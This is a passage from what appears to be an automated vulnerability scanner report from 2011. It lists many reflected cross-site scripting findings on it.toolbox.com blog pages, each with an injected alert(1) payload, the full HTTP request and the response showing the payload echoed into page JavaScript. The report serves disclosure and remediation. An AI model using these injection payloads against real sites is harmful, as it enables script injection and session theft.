<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Change Orig ...[SNIP]... Clicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fentry.aspx%3fslug%3dppmtoday%26i%3d39674%266adc7'-alert(1)-'c1d11b6e461%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f57ac'-alert(1)-'b6aa0518d05 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/f57ac'-alert(1)-'b6aa0518d05 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 63836 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:46:14 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Future Stat ...[SNIP]... != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dppmtoday%26f57ac'-alert(1)-'b6aa0518d05'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl; // G ...[SNIP]...
3.50. http://it.toolbox.com/blogs/ppmtoday/does-john-stewart-run-a-cmm-level-5-shop-42066 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f05d3'-alert(1)-'3e9e700a587 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/does-john-stewart-run-a-cmm-level-5-shop-42066?f05d3'-alert(1)-'3e9e700a587=1 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 67587 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:45:38 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:45:38 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Does John S ...[SNIP]... Clicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fentry.aspx%3fslug%3dppmtoday%26i%3d42066%26f05d3'-alert(1)-'3e9e700a587%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7389a'-alert(1)-'c353bec37b3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/7389a'-alert(1)-'c353bec37b3 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 63838 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:46:09 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Future Stat ...[SNIP]... != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dppmtoday%267389a'-alert(1)-'c353bec37b3'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl; // G ...[SNIP]...
3.52. http://it.toolbox.com/blogs/ppmtoday/dx3-data-driven-decisions-41860 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://it.toolbox.com
Path:
/blogs/ppmtoday/dx3-data-driven-decisions-41860
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 89332'-alert(1)-'7884c23ec6a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/dx3-data-driven-decisions-41860?89332'-alert(1)-'7884c23ec6a=1 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 73313 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:45:33 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:45:33 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Dx3: Data D ...[SNIP]... Clicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fentry.aspx%3fslug%3dppmtoday%26i%3d41860%2689332'-alert(1)-'7884c23ec6a%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 153bd'-alert(1)-'8a6f1963125 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/153bd'-alert(1)-'8a6f1963125 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 63838 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:47:49 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Future Stat ...[SNIP]... != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dppmtoday%26153bd'-alert(1)-'8a6f1963125'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl; // G ...[SNIP]...
3.54. http://it.toolbox.com/blogs/ppmtoday/elementary-school-and-saas-38160 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://it.toolbox.com
Path:
/blogs/ppmtoday/elementary-school-and-saas-38160
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b7181'-alert(1)-'56eb5abc328 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/elementary-school-and-saas-38160?b7181'-alert(1)-'56eb5abc328=1 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 70424 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:47:15 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:47:14 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Elementary ...[SNIP]... Clicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fentry.aspx%3fslug%3dppmtoday%26i%3d38160%26b7181'-alert(1)-'56eb5abc328%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e4612'-alert(1)-'0963bd1ab64 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/e4612'-alert(1)-'0963bd1ab64 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 63834 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:47:14 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Future Stat ...[SNIP]... != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dppmtoday%26e4612'-alert(1)-'0963bd1ab64'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl; // G ...[SNIP]...
3.56. http://it.toolbox.com/blogs/ppmtoday/it-starts-with-data-40018 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://it.toolbox.com
Path:
/blogs/ppmtoday/it-starts-with-data-40018
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58a79'-alert(1)-'14647d4667a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/it-starts-with-data-40018?58a79'-alert(1)-'14647d4667a=1 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 73100 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:46:37 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:46:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> It Starts W ...[SNIP]... Clicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fentry.aspx%3fslug%3dppmtoday%26i%3d40018%2658a79'-alert(1)-'14647d4667a%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 994fe'-alert(1)-'a2173915a6a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/994fe'-alert(1)-'a2173915a6a HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 63838 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:46:09 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Future Stat ...[SNIP]... != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dppmtoday%26994fe'-alert(1)-'a2173915a6a'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl; // G ...[SNIP]...
3.58. http://it.toolbox.com/blogs/ppmtoday/key-success-factorswho-needs-em-42168 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f41c0'-alert(1)-'48b85824530 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/key-success-factorswho-needs-em-42168?f41c0'-alert(1)-'48b85824530=1 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 72848 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:45:34 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:45:33 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Key Success ...[SNIP]... Clicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fentry.aspx%3fslug%3dppmtoday%26i%3d42168%26f41c0'-alert(1)-'48b85824530%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b9924'-alert(1)-'aace0a2e612 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/b9924'-alert(1)-'aace0a2e612 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 63836 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:46:12 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Future Stat ...[SNIP]... != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dppmtoday%26b9924'-alert(1)-'aace0a2e612'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl; // G ...[SNIP]...
3.60. http://it.toolbox.com/blogs/ppmtoday/life-cycles-40815 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://it.toolbox.com
Path:
/blogs/ppmtoday/life-cycles-40815
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 60204'-alert(1)-'ba784fcf1d3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/life-cycles-40815?60204'-alert(1)-'ba784fcf1d3=1 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 68422 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:45:36 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:45:36 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Life Cycles ...[SNIP]... Clicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fentry.aspx%3fslug%3dppmtoday%26i%3d40815%2660204'-alert(1)-'ba784fcf1d3%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4b2d'-alert(1)-'86aa45cbdf4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/a4b2d'-alert(1)-'86aa45cbdf4 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 63836 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:46:06 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Future Stat ...[SNIP]... != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dppmtoday%26a4b2d'-alert(1)-'86aa45cbdf4'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl; // G ...[SNIP]...
3.62. http://it.toolbox.com/blogs/ppmtoday/making-the-case-43129 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://it.toolbox.com
Path:
/blogs/ppmtoday/making-the-case-43129
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c45be'-alert(1)-'37141b736fd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/ppmtoday/making-the-case-43129?c45be'-alert(1)-'37141b736fd=1 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 74108 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:45:27 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:45:27 GMT Connection: close
